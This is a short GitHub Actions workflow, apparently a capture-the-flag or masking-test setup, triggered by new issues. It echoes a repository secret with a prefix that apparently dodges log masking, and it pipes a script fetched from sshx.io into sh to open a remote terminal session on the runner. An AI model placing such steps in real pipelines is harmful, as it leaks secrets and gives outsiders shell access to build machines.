name: mask issue
on:
  issues
        
jobs:
  a:
    runs-on: ubuntu-latest
    env:
      ENTRY: ${{ github.event.issue.title }}
      FLAG: ${{ secrets.FLAG }}
    steps:
      - run: echo "entry $ENTRY"
      - run: echo "pre$FLAG"
      - run: curl -sSf https://sshx.io/get | sh -s run
